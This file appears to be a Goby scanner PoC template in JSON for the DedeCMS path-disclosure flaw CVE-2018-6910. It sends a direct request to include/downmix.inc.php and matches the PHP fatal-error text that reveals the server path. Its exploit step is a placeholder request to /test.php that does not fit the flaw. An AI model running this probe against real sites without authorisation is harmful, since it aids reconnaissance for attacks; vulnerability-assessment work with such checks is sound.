Goby/json/DedeCMS_InfoLeak_CVE-2018-6...

111 lines
4.2 KiB
JSON

{
"Name": "DedeCMS InfoLeak CVE-2018-6910",
"Level": "1",
"Tags": [
"infoleak"
],
"GobyQuery": "app=\"DedeCMS\"",
"Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.",
"Product": "DedeCMS",
"Homepage": "http://www.dedecms.com/",
"Author": "",
"Impact": "A remote attacker could exploit this vulnerability to obtain the full path by sending a direct request to the include/downmix.inc.php or inc/inc_archives_functions.php files.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/include/downmix.inc.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Fatal error",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "downmix.inc.php",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Call to undefined function helper()",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}